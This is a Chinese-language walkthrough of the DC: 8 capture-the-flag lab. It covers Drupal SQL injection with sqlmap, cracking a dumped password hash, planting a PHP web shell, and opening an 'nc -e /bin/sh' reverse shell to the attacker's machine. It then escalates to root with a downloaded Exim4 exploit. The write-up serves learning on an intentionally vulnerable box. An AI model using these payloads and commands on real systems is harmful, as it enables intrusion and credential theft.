原本預計在過年連假以前將 DC 系列題目解完,至今卻只解到 DC: 8,一不小心就欠過年了,現在積極還債,不過除了該題以外也只剩下 DC: 9 一題,順利的話應該可以在這週內將 DC 系列全部攻略。
環境設定
VirtualBox: Kali & DC: 8
Net Config: NAT Network
尋找靶機
$ nmap 10.0.2.1/24 -sP
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-17 14:21 CST
Nmap scan report for 10.0.2.1
Host is up (0.011s latency).
Nmap scan report for 10.0.2.2
Host is up (0.0014s latency).
Nmap scan report for 10.0.2.15
Host is up (0.00011s latency).
Nmap scan report for 10.0.2.19
Host is up (0.00091s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.96 seconds
$ nmap 10.0.2.19 -p- -A
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-17 14:21 CST
Nmap scan report for 10.0.2.19
Host is up (0.0010s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)
| 256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)
|_ 256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)
80/tcp open http Apache httpd
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache
|_http-title: Welcome to DC-8 | DC-8
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.09 seconds
解題過程
Wappalyzer
發現 DC: 8 是個 Drupal 7 的 CMS 服務,作者好像很喜歡用 Drupal?
Droopescan
這部分發現一個小工具,如圖 wpscan 一般,可以針對 Durpal 自動情資蒐集,以省下人力成本。
$ droopescan scan drupal -u 10.0.2.19
[+] Plugins found:
ctools http://10.0.2.19/sites/all/modules/ctools/
http://10.0.2.19/sites/all/modules/ctools/LICENSE.txt
http://10.0.2.19/sites/all/modules/ctools/API.txt
views http://10.0.2.19/sites/all/modules/views/
http://10.0.2.19/sites/all/modules/views/README.txt
http://10.0.2.19/sites/all/modules/views/LICENSE.txt
webform http://10.0.2.19/sites/all/modules/webform/
http://10.0.2.19/sites/all/modules/webform/README.md
http://10.0.2.19/sites/all/modules/webform/LICENSE.txt
ckeditor http://10.0.2.19/sites/all/modules/ckeditor/
http://10.0.2.19/sites/all/modules/ckeditor/CHANGELOG.txt
http://10.0.2.19/sites/all/modules/ckeditor/README.txt
http://10.0.2.19/sites/all/modules/ckeditor/LICENSE.txt
better_formats http://10.0.2.19/sites/all/modules/better_formats/
http://10.0.2.19/sites/all/modules/better_formats/README.txt
http://10.0.2.19/sites/all/modules/better_formats/LICENSE.txt
profile http://10.0.2.19/modules/profile/
php http://10.0.2.19/modules/php/
image http://10.0.2.19/modules/image/
[+] Themes found:
seven http://10.0.2.19/themes/seven/
garland http://10.0.2.19/themes/garland/
[+] Possible version(s):
7.67
[+] Possible interesting urls found:
Default changelog file - http://10.0.2.19/CHANGELOG.txt
Default admin - http://10.0.2.19/user/login
Get the Shell
透過 Droopescan 得到版本號為 7.67,而線上 exploit 版本都是 < 7.58,這也表示該題可能不是像 DC: 1 透過已知的弱點來 RCE,轉而查看系統上已安裝的 Plugin 套件,但也沒有什麼發現。
最後在閒逛網站發現 nid=1 反射動作的直接加上單引號出現了錯誤訊息,其實有點意外,畢竟是 CMS 然後出現這種極為常見的 SQL Injection 弱點。
隨後就直上 sqlmap 拿到了管理員密碼。
$ sqlmap -u "http://10.0.2.19/?nid=1" -D d7db -T users --dump
Database: d7db
Table: users
[3 entries]
+-----+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+-----------------------+---------+---------------------------------------------------------+------------+---------+------------+--------+------------+---------+--------------------+-----------+------------+------------------+
| uid | data | init | mail | name | pass | login | theme | access | status | created | picture | timezone | signature | language | signature_format |
+-----+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+-----------------------+---------+---------------------------------------------------------+------------+---------+------------+--------+------------+---------+--------------------+-----------+------------+------------------+
| 0 | NULL | <blank> | <blank> | <blank> | <blank> | 0 | <blank> | 0 | 0 | 0 | 0 | NULL | <blank> | <blank> | NULL |
| 1 | a:2:{s:7:"contact";i:0;s:7:"overlay";i:1;} | [email protected] | [email protected] | admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z | 1567766626 | <blank> | 1567766818 | 1 | 1567489015 | 0 | Australia/Brisbane | <blank> | <blank> | filtered_html |
| 2 | a:5:{s:16:"ckeditor_default";s:1:"t";s:20:"ckeditor_show_toggle";s:1:"t";s:14:"ckeditor_width";s:4:"100%";s:13:"ckeditor_lang";s:2:"en";s:18:"ckeditor_auto_lang";s:1:"t";} | [email protected] | [email protected] | john | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF | 1567497783 | <blank> | 1567498512 | 1 | 1567489250 | 0 | Australia/Brisbane | <blank> | <blank> | filtered_html |
+-----+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+-----------------------+---------+---------------------------------------------------------+------------+---------+------------+--------+------------+mpm---------+--------------------+-----------+------------+------------------+
這邊有個提示,使用者名稱 john 跟 John the Ripper (JTR) 破密工具同名,顧名思義就是要你破 john 的密碼?
$ echo -en "\$S\$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF" > john.hash
$ john john.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Drupal7, $S$ [SHA512 128/128 SSE2 2x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
turtle (?)
1g 0:00:00:02 DONE (2021-02-17 15:24) 0.3745g/s 188.7p/s 188.7c/s 188.7C/s turtle..claire
Use the "--show" option to display all of the cracked passwords reliably
Session completed
取得密碼組 john/turtle 並登入成功,隨後在編輯模式下發現與 DC: 7 一樣的編輯工具,並且可以切換成 PHP Code 模式,這也與 Droopescan 的偵查到含有安裝 PHP 套件的結果相符。
接著就可以把 WebShell 寫在這個地方。
<?php
echo system($_POST['cmd']);
?>
成功取得 Webshell。
Get Reverse shell
接著就是一樣的套路,建立 nc 再送 Payload 丟一個 Reverse shell 回來。
Listen
nc -nl -vv -p 8888
Victim
nc -e /bin/sh 10.0.2.15 8888
python -c "import pty;pty.spawn('/bin/bash')"
Get Root to Win
SUID Check
查看 SUID 發現 exim4 存放位置與其他不相同,於是簡單 Google 發現是個 SMTP 套件,並發現它含有可利用的 Exploit 弱點。
Exim4 是 Debian 默認的 MTA (Message Transfer Agent) ,連基本系統裡面都 有它,用他自然是和系統兼容性最好的了。在 Debian 下配置 Exim 很方便,系 統提供了一個配置腳本,可以通過回答問題的方式來進行配置。
https://lifegoo.pluskid.org/wiki/Exim4.html
www-data@dc-8:/tmp $ find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount
Get Root
發現 Exim4 含有弱點並且可以用來提權,就直接嘗試 exploit,但下載下來會有 ^M(/r) 的問題,這部分由於之前遇過,並且使用 cat << EOF > FileName 的方式解決,但這部分因為不知明原因導致在 EOF 結束後會出現意外結束。
也感謝熱情的同事提供相關經驗與做法,使用過 set ff=unix 解決問題,但在 Reverse shell 環境下使用 vi 一直無法成功,透過 vi 的 :%s/^M/\r/g 置換 ^M 也有些問題,最簡單的方式則是在本地端建立已經去除 ^M 的版本,並提供給靶機下載。
Listen
wget https://www.exploit-db.com/download/46996
vi 46996
:set ff=unix
python -m SimpleHTTPServer
Victim
wget http://10.0.2.15:8000/46996
chmod +x 46996
bash 46996 -m netcat
whoami
Flag
cat /root/flag.txt
Brilliant - you have succeeded!!!
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Hope you enjoyed DC-8. Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.
I'm also sending out an especially big thanks to:
@4nqr34z
@D4mianWayne
@0xmzfr
@theart42
This challenge was largely based on two things:
1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42
The answer to that question is...
If you enjoyed this CTF, send me a tweet via @DCAU7.
